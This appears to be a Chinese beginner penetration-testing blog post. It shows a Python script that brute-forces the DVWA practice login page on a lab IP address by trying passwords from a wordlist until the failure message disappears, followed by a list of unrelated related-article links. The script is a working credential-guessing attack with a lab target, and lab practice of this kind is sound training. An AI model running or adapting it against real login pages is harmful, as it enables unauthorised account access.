渗透测试入门学习——编写python脚本实现对网站登录页面的暴力破解

import requests
# 填入请求地址
url = "http://192.168.160.131/DVWA/vulnerabilities/brute/"
# 填入请求头中的Cookie值
cookie = "security=low; PHPSESSID=gcgc5dhp7ikcedlhojofijia44"
username = "admin"
# success为未知，但可以尝试出登陆失败的信息
success = ""
failure = "Username and/or password incorrect"

count = 0

with open("./pswd.txt", 'r') as file:

    while True:
        # 按行读，避免用readlines()读取全部后导致占用太多内存
        line = file.readline()
        # 如果读到内容为空的行则结束
        if not line:
           break;
        # 每行结尾自带换行符需要去掉
        line = line.strip()
        # 发送请求
        count += 1
        response = requests.get(url = url,
                                params = {"username":username, "password":line, "Login":"Login"},
                                headers = {"Cookie":cookie})
        # 判断请求中有无特征字
        if failure in response.text:
            print("第"+ str(count) +"次尝试--失败：",line)
        else :
            print("第"+ str(count) +"次尝试--成功：",line)
            break;

相关文章：

自动化办公-Python中的for循环

网络安全中的 EDR 是什么：概述和功能

【芋道源码】gitee很火的开源项目pig——后台管理快速开发框架使用笔记（微服务版之本地开发环境篇）

计算机网络面试题——第二篇

java中创建jdbc应用程序

OJ在线评测系统 前端 完善题目提交服务 细讲异步前端请求与后端接口交互

代码随想录算法训练营第34天｜46. 携带研究材料、416. 分割等和子集

Android 12系统源码_输入系统（三）输入事件的加工和分发

Spring RestTemplate 升级 WebClient 导致 OutOfMemoryError

SQL进阶技巧：如何利用if语句简化where或join中的条件 | if条件语句的优雅使用方法

QT界面制作

粉丝们得以一窥索菲亚罗兰奢华的90岁生日庆祝仪式！ 她已完成了所有的遗愿清单 ！

选择租用徐州存储服务器有什么作用？

大数据-149 Apache Druid 基本介绍 技术特点 应用场景

2024年7月大众点评广州美食店铺基础信息

2024.9.24 作业

Stable Diffusion 蒙版：填充、原图、潜空间噪声（潜变量噪声）、潜空间数值零（潜变量数值零）

我店生活系统小程序开发功能解析

uniapp框架中实现文件选择上传组件，可以选择图片、视频等任意文件并上传到当前绑定的服务空间

修改 idea 的 Terminal 命令窗口使用 git-bash

得物App荣获新奖项，科技创新助力高质量发展

国内ChatGPT镜像网站整理汇总【OpenAI o1/GPT 4o】-2024/10月最新

【数据结构与算法】算法和算法分析

nginx服务介绍

ros2 colcon build 构建后，install中的local_setup.bash 和setup.bash有什么区别

企业数据可视化大屏的工具选择有哪些

UI设计师面试整理-设计趋势和行业理解

互斥量mutex、锁、条件变量和信号量相关原语（函数）----很全

从两个 Excel 表格中提取相关信息，并根据学生的 学号 和 姓名 将第一个表格中的成绩数据填充到第二个表格中（附Python代码）

【LeetCode HOT 100】详细题解之链表篇